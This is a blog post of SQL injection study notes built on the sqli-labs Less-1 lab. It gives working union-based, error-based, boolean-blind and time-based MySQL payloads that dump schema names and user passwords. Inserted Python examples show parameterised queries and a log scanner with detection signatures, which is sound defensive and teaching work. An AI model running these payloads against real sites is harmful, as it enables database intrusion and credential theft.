<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
<meta name="google-site-verification" content="fQ_tfBgNjE9NQcpKnGAkWapHoKuimF5lVuNuqpPXar0">
    <meta charset="utf-8">
    
    <title>SQL Injection Study Notes | Xiao Leung&#39;s Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    
      <link rel="icon" href="/favicon.png">
    

    <link rel="stylesheet" href="/css/style.css">

    <link rel="stylesheet" href="/js/google-code-prettify/tomorrow-night-eighties.min.css">

  </head>

  <body>
<header>

	<a id="logo" href="/" title="Xiao Leung&#39;s Blog">
	<img src="/favicon.png" alt="Xiao Leung&#39;s Blog"></a>
	
	
	

	
		<!--Side navigation bar-->
		<a id="nav-toggle" href="#"><span></span></a>

<nav>
	<div class="menu-top-container">
		<ul id="menu-top" class="menu">
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/2019/08/01/HelloWorld/" target="_blank">AboutMe</a>
				</li>
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/HXCTF/" target="_blank">HXCTF</a>
				</li>
			
		</ul>
	</div>
</nav>
	

</header>

<div class="m-header ">
	<section id="hero1" class="hero">
		<div class="inner">
		</div>
	</section>
	
		<figure class="top-image" data-enable=true></figure>
	
</div>

<!--Article list-->
<div class="wrapper">
  
    <!--Article-->
<article>
	
  
    <h1 class="post-title" itemprop="name">
      SQL Injection Study Notes
    </h1>
  

	<div class='post-body mb'>
		<ul>
<li>Time: 2019-08-06 21:39:22</li>
<li>Place: Fuzhou University</li>
</ul>
<h3 id="单引号字符型注入"><a href="#单引号字符型注入" class="headerlink" title="单引号字符型注入"></a>Single-quote string injection</h3><h4 id="漏洞特征"><a href="#漏洞特征" class="headerlink" title="漏洞特征"></a>Vulnerability indicator</h4><p>With <code>and 1=2</code> appended the page still returns normally, but a lone <code>'</code> produces an error.</p>
<ul>
<li><strong>SQL statement</strong>:</li>
</ul>
<pre><code class="mysql">&#39;order by 1,2,3--+</code></pre>
<ul>
<li><p><strong>Meaning</strong>: find out how many columns the query returns; if the number given exceeds the actual column count, an error is raised.</p>
</li>
<li><p><strong>e.g.</strong>:</p>
</li>
</ul>
<pre><code class="html">http://www.sql.com/Less-1/?id=1%27%20order%20by%201,2,3%20--+</code></pre>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649678592883.png" alt="1564883718907"></p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649679094636.png" alt="1564884099855"></p>
<h4 id="检测回显位"><a href="#检测回显位" class="headerlink" title="检测回显位"></a>Detecting the echo positions</h4><ul>
<li><strong>SQL statement:</strong></li>
</ul>
<pre><code class="mysql">union select 1,2,3--+</code></pre>
<ul>
<li><p><strong>Meaning:</strong> find which columns of the query are displayed on the page. Set <code>id</code> to a non-existent value so the original query returns no row, then run the union; any column whose number appears on the page is a position through which query results can be returned.</p>
</li>
<li><p><strong>e.g.:</strong></p>
</li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,2,3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649682028375.png" alt="1564884653714"></p>
<h4 id="爆数据库"><a href="#爆数据库" class="headerlink" title="爆数据库"></a>Dumping the database names</h4><ul>
<li><strong>SQL statement:</strong></li>
</ul>
<pre><code class="mysql">select group_concat(schema_name) from information_schema.schemata # note: group_concat() joins the returned rows into a single line of output</code></pre>
<ul>
<li><strong>Meaning:</strong> query the <code>schema_name</code> column of the <code>schemata</code> table in the <code>information_schema</code> database; this column stores the names of all MySQL databases (MySQL 5.5+).</li>
<li><strong>e.g.:</strong></li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649682417938.png" alt="1564885490338"></p>
<h4 id="爆表名"><a href="#爆表名" class="headerlink" title="爆表名"></a>Dumping table names</h4><ul>
<li><strong>SQL statement:</strong></li>
</ul>
<pre><code class="mysql">select group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39; --+</code></pre>
<ul>
<li><strong>Meaning:</strong> query <code>table_name</code> from the <code>tables</code> table of <code>information_schema</code> where <code>table_schema</code> (which holds the database name) is <code>security</code>; this dumps every table name in that database.</li>
<li><strong>e.g.:</strong></li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649683003970.png" alt="1564885936768"></p>
<h4 id="爆表段"><a href="#爆表段" class="headerlink" title="爆表段"></a>Dumping column names</h4><ul>
<li><strong>SQL statement:</strong></li>
</ul>
<pre><code class="mysql">select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;</code></pre>
<ul>
<li><strong>Meaning:</strong> query the <code>column_name</code> column of the <code>columns</code> table in <code>information_schema</code> where <code>table_name='users'</code>; this lists every column of that table.</li>
<li><strong>e.g.:</strong></li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=%27users%27),3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649683779377.png" alt="1564886738794"></p>
<h4 id="爆表段值"><a href="#爆表段值" class="headerlink" title="爆表段值"></a>Dumping column values</h4><ul>
<li><strong>SQL statement:</strong></li>
</ul>
<pre><code class="mysql">select group_concat(password) from security.users</code></pre>
<ul>
<li><strong>Meaning:</strong> fetch every value of the <code>password</code> column in the <code>users</code> table of the <code>security</code> database; usernames are fetched the same way.</li>
<li><strong>e.g.:</strong></li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(password)%20from%20security.users),3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/1564968443135.png" alt="1564887127624"></p>
<p>(End)</p>
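<p>To make the defensive point behind the walkthrough concrete, here is an added example (not code from these notes or from sqli-labs) in Python against an in-memory SQLite database: the lookup query built by string concatenation, as Less-1 does, next to the same query with a bound parameter. The <code>users</code> rows are constructed stand-ins for the lab's <code>security.users</code> table; the payload is the notes' own "dump column values" payload, URL-decoded.</p>

```python
import sqlite3

# Constructed stand-in for sqli-labs' security.users table (this is an added
# example, not the notes' or sqli-labs' own code; the rows are made up).
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
]

# The notes' "dump column values" payload, decoded from its URL form. SQLite
# parses "--" comments and UNION SELECT the same way MySQL does, which is all
# this demonstration needs.
UNION_PAYLOAD = "-1' union select 1,(select group_concat(password) from users),3--+"


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with a users table shaped like the lab's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str):
    """Build the query by string concatenation, the pattern behind Less-1.

    The request parameter is spliced between single quotes, so a quote in the
    parameter closes the literal and everything after it is parsed as SQL:
    the UNION adds a row of attacker-chosen columns and "--" comments out
    the original LIMIT clause.
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{id_param}' LIMIT 1"
    return conn.execute(sql).fetchone()


def lookup_safe(conn: sqlite3.Connection, id_param: str):
    """Same query with a bound parameter.

    The driver sends the value separately from the statement text, so quotes,
    comment markers and UNION inside it are never interpreted as SQL; the
    whole payload is simply compared against the id column and matches nothing.
    """
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (id_param,)).fetchone()


def demo():
    """Run the payload through both variants and return the three results."""
    conn = make_db()
    leaked = lookup_vulnerable(conn, UNION_PAYLOAD)   # injected row carrying every password
    blocked = lookup_safe(conn, UNION_PAYLOAD)        # None: no id equals the payload text
    normal = lookup_safe(conn, "2")                   # a legitimate lookup still works
    return leaked, blocked, normal


if __name__ == "__main__":
    for label, row in zip(("vulnerable", "parameterised", "normal"), demo()):
        print(f"{label:>13}: {row}")
```

<p>Run it with <code>python3</code>: the concatenated variant hands back a row whose second column is every password in the table, the parameterised variant returns <code>None</code> for the same input, and a legitimate <code>id=2</code> still resolves. SQLite does not guarantee the order inside <code>group_concat</code>, so the order of the leaked list may vary between runs. The fix carries over unchanged to the lab's PHP and MySQL: prepared statements with bound parameters (PDO or mysqli) instead of interpolating the request parameter into the query string.</p>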
<h3 id="数值型注入"><a href="#数值型注入" class="headerlink" title="数值型注入"></a>Numeric injection</h3><p><strong>Indicator:</strong> if the page changes between <code>and 1=1</code> and <code>and 1=2</code>, the injection is numeric. The procedure is the same as above, but no <code>'</code> is needed to close the string.</p>
<h3 id="单引号括型字符型注入"><a href="#单引号括型字符型注入" class="headerlink" title="单引号括型字符型注入"></a>Single-quote-with-parenthesis string injection</h3><ul>
<li><strong>Indicator:</strong> if <code>and 1=1</code> and <code>and 1=2</code> return no difference, the injection is string-based; if closing with a single quote and then using <code>order by</code> raises a syntax error, closing with <code>')</code> allows normal injection.</li>
</ul>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>Error-based injection</h3><p>If an injection exists but there is no echo position, yet the page shows database error messages, the error message itself can serve as the echo position.</p>
<ul>
<li><strong>Three ways to trigger error-based injection:</strong></li>
</ul>
<ol>
<li><p>Via <code>floor()</code></p>
<pre><code class="mysql">and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)</code></pre>
<p>Output length is limited to 64 characters.</p>
</li>
<li><p>Via <code>updatexml()</code></p>
<pre><code class="mysql">and updatexml(1,payload,1)</code></pre>
<p>This statement also limits the output length, to at most 32 characters.<br>It also constrains the return type of the payload: it only takes effect when what the payload returns is not in XML format.</p>
</li>
<li><p>Via <code>ExtractValue()</code></p>
<pre><code class="mysql">and extractvalue(1, payload)</code></pre>
<p>Output length is limited, to at most 32 characters.</p>
</li>
</ol>
<p>Example:</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190806/1565058715692.png" alt></p>
<h4 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>Blind injection</h4><pre><code class="mysql"># functions that boolean-based blind injection may use
ascii()             # converts the argument to its ASCII code
ORD()               # similar usage to ascii()
substr(a,b,c)       # takes c characters of string a, starting at position b
mid()               # same usage as substr()
length(str)         # returns the length of string str
left(database(),1)  # takes the leftmost character of the database name</code></pre>
<p>Example</p>
<pre><code class="mysql">&#39; and mid(version(),2,1)=&#39;.&#39; --+</code></pre>
<p>Meaning: <code>mid</code> extracts the second character of the version string and the comparison checks whether it equals "."; if so the condition is TRUE, otherwise FALSE.</p>
<pre><code class="mysql"># enumerate the database version:
and mid(version(),1,1)=1
# enumerate the database user:
and ascii(mid(user(),1,1))&gt;18
# enumerate table names:
and ascii(mid((select table_name from information_schema.tables where table_schema=&#39;security&#39; limit 0,1),1,1))&gt;18</code></pre>
<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>Time-based blind injection</h4><pre><code class="mysql">if(ascii(substr(database(),1,1))&gt;115,0,sleep(5))%23  # IF expression: when the condition is false, sleep() runs</code></pre>
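<p>From the defender's side, the error-based and blind techniques above all leave characteristic tokens in the request URL (<code>updatexml(</code>, <code>extractvalue(</code>, <code>floor(rand(</code>, <code>sleep(</code>, <code>and 1=1</code>), just as the union-based section leaves <code>union select</code>, <code>order by</code> and <code>information_schema</code>. The following Python is an added example, not code from these notes: it parses common-log-format access lines, URL-decodes the query string twice (the notes' payloads arrive as <code>%27</code>/<code>%20</code>), and tags each request with the technique it resembles. The log lines, client addresses and timestamps are constructed; the request paths mirror the URL shapes used in the notes.</p>

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server access-log lines (an added example, not from the notes):
# the request paths mirror the URL shapes in the notes, while the client
# addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Aug/2019:21:39:22 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [06/Aug/2019:21:39:30 +0800] "GET /Less-1/?id=1%27%20order%20by%201,2,3%20--+ HTTP/1.1" 200 498
10.0.0.5 - - [06/Aug/2019:21:39:41 +0800] "GET /Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3--+ HTTP/1.1" 200 620
10.0.0.9 - - [06/Aug/2019:21:40:02 +0800] "GET /Less-1/?id=1%27%20and%20updatexml(1,version(),1)--+ HTTP/1.1" 200 700
10.0.0.9 - - [06/Aug/2019:21:40:15 +0800] "GET /Less-1/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E115,0,sleep(5))%23 HTTP/1.1" 200 480
10.0.0.7 - - [06/Aug/2019:21:41:00 +0800] "GET /search?q=select%20your%20plan HTTP/1.1" 200 1024
"""

# Common log format: client, identity, user, [timestamp], "METHOD path PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# One regex per technique described in the notes; all run on the decoded,
# lower-cased, whitespace-collapsed query string.
SIGNATURES = {
    "order-by-probe":     re.compile(r"\border\s+by\s+\d"),
    "union-select":       re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "error-based-xml":    re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
    "error-based-floor":  re.compile(r"\bfloor\s*\(\s*rand\s*\("),
    "boolean-probe":      re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+"),
    "time-based":         re.compile(r"\bsleep\s*\("),
}


def normalize(query: str) -> str:
    """Decode the query string twice (catches %2527-style double encoding),
    collapse whitespace and lower-case it so the signatures see one form."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(query: str) -> list:
    """Return the names of every signature that matches the query string."""
    norm = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]


def scan_log(text: str) -> list:
    """Return (client, raw path, matched techniques) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # skip lines that are not in the expected format
        query = m.group("path").partition("?")[2]
        matched = classify(query) if query else []
        if matched:
            hits.append((m.group("ip"), m.group("path"), matched))
    return hits


if __name__ == "__main__":
    for ip, path, techniques in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(techniques):32} {path}")
```

<p>Matching on the decoded, whitespace-collapsed, lower-cased text is what stops the <code>%20</code>-encoded and double-encoded (<code>%2527</code>) variants from slipping past a naive substring check, and the signatures are kept narrow (for instance <code>order by</code> followed by a digit) so that an ordinary search such as the last sample line is not flagged. Signatures like these are a detection aid for logs or a WAF, not a substitute for the real fix, which is the parameterised query shown earlier.</p>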
<h4 id="SQL注入高级用法（读写文件）"><a href="#SQL注入高级用法（读写文件）" class="headerlink" title="SQL注入高级用法（读写文件）"></a><strong>Advanced SQL injection (reading and writing files)</strong></h4><p>(to be added later)</p>

	</div>
	<div class="meta split">
		
		
		<time class="post-date" datetime="2019-08-04T02:05:54.000Z" itemprop="datePublished">2019-08-04</time>
	</div>
</article>



  
</div>


  <svg id="bigTriangleColor" width="100%" height="40" viewBox="0 0 100 102" preserveAspectRatio="none">
    <path d="M0 0 L50 100 L100 0 Z"></path>
  </svg>

  


  <div class="wrapper"></div>





<div class="fat-footer">
	<div class="wrapper">
		<div class="layout layout--center">
			<div class="layout__item palm-mb">
				<div class="media">
					<img class="headimg" src='/assets/blogImg/litten.png' alt='XiaoLeung'>
					<div class="media__body">
						<h4>兵至如归-Xiaoleung&#39;s Blog</h4>
						<p class='site-description'>Don&#39;t forget why we started</p>
					</div>
				</div>
				<div class="author-contact">
					<ul>
						
							
							<li>
				        		<a href="https://github.com/sharpleung" target="_blank">
				        			
				        				<i class="iconfont icon-github"></i>
				        			
				        		</a>
				        	</li>
						
					</ul>
				</div>
			</div>
		</div>
	</div>
</div>

<footer class="footer" role="contentinfo">
	<div class="wrapper wrapper--wide split split--responsive">
<a href="http://beian.miit.gov.cn/">粤ICP备18132442号-1</a><br>
<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44011202000643" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="http://beian.gov.cn/img/ghs.png" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">粤公网安备 44011202000643号</p></a><br>

		
		
		<span>Theme by <a href="http://github.com/justpsvm">justpsvm</a>. Powered by <a href="http://hexo.io">Hexo</a></span>
	</div>
</footer>

	<!-- lib.js is loaded here and already bundles jQuery and the other frameworks, so this include is commented out -->
	<!--<script src="http://lib.sinaapp.com/js/jquery/2.0/jquery.min.js"></script>-->
	<script src="/js/lib.js"></script>
	<script src="/js/google-code-prettify/prettify.js"></script>
	<script src="/js/module.js"></script>
	<script src="/js/script.js"></script>
	
	
	<script type='text/javascript'>
		//code highlighting
		$(document).ready(function(){
	 		$('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
   			prettyPrint();
		});
	</script>
	<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>


